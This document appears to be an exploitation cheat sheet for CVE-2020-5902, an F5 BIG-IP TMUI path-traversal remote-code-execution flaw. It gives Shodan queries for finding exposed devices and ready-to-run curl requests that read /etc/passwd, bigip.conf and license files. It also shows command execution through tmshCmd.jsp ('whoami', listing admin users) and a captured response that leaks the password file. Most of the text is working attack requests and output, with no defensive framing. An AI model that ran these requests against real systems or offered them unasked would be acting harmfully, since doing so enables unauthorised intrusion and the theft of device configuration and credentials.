CVE

CVE-2020-5902 - F5 BIG-IP TMUI RCE

title:"Big-IP®" org:"Organization Name"
http.title:"BIG-IP®- Redirect" org:"Organization Name"
http.favicon.hash:-335242539 "3992" org:"Organization Name"

Metasploit module

modules/exploits/linux/http/f5_bigip_tmui_rce.rb

Validate interface accessible

You need to get a 200OK on the following request.

curl -v -k  'https://{host}/tmui/login.jsp'

Check (Local File Inclusion)

Interesting files:

https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
https://{host}/tmui/login.jsp/..;/tmui/system/user/authproperties.jsp
https://{host}/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=jaffa
https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license
https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf

RCE

https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=whoami
curl -v -k  'https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'

Example RCE

$ curl -v -k 'https://10.10.10.10/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'
*   Trying 10.10.10.10:443...
* TCP_NODELAY set
* Connected to 10.10.10.10 (10.10.10.10) port 443 (#0)
* ALPN, offering h2
* ALPN, offering http/1.1
* successfully set certificate verify locations:
*   CAfile: /etc/ssl/certs/ca-certificates.crt
  CApath: /etc/ssl/certs
* TLSv1.3 (OUT), TLS handshake, Client hello (1):
* TLSv1.3 (IN), TLS handshake, Server hello (2):
* TLSv1.2 (IN), TLS handshake, Certificate (11):
* TLSv1.2 (IN), TLS handshake, Server key exchange (12):
* TLSv1.2 (IN), TLS handshake, Server finished (14):
* TLSv1.2 (OUT), TLS handshake, Client key exchange (16):
* TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):
* TLSv1.2 (OUT), TLS handshake, Finished (20):
* TLSv1.2 (IN), TLS handshake, Finished (20):
* SSL connection using TLSv1.2 / ECDHE-RSA-AES256-GCM-SHA384
* ALPN, server did not agree to a protocol
[...]
> GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1
> Host: 10.10.10.10
> User-Agent: curl/7.68.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Mon, 06 Jul 2020 09:08:33 GMT
< X-Frame-Options: SAMEORIGIN
< Strict-Transport-Security: max-age=16070400; includeSubDomains
< Set-Cookie: JSESSIONID=E3418E061E43DC67AC2E9D59A4E42FC2; Path=/tmui; Secure; HttpOnly
< Content-Type: text/html;charset=ISO-8859-1
< Content-Length: 7630
< X-Content-Type-Options: nosniff
< X-XSS-Protection: 1; mode=block
< Content-Security-Policy: default-src 'self'  'unsafe-inline' 'unsafe-eval' data: blob:; img-src 'self' data:  http://127.4.1.1 http://127.4.2.1
< Vary: Accept-Encoding
<

{"output":"root:x:0:0:root:\/root:\/bin\/bash\nbin:x:1:1:bin:\/bin:\/sbin\/nologin\ndaemon:x:2:2:daemon:\/sbin:\/sbin\/nologin\nadm:x:3:4:adm:\/var\/adm:\/sbin\/nologin\nlp:x:4:7:lp:\/var\/spool\/lpd:\/sbin\/nologin\nmail:x:8:12:mail:\/var\/spool\/mail:\/sbin\/nologin\nuucp:x:10:14:uucp:\/var\/spool\/uucp:\/sbin\/nologin\noperator:x:11:0:operator:\/root:\/sbin\/nologin\nnobody:x:99:99:Nobody:\/:\/sbin\/nologin\ntmshnobody:x:32765:32765:tmshnobody:\/:\/sbin\/nologin\nadmin:x:0:500:Admin User:\/home\/admin:[...]

URL list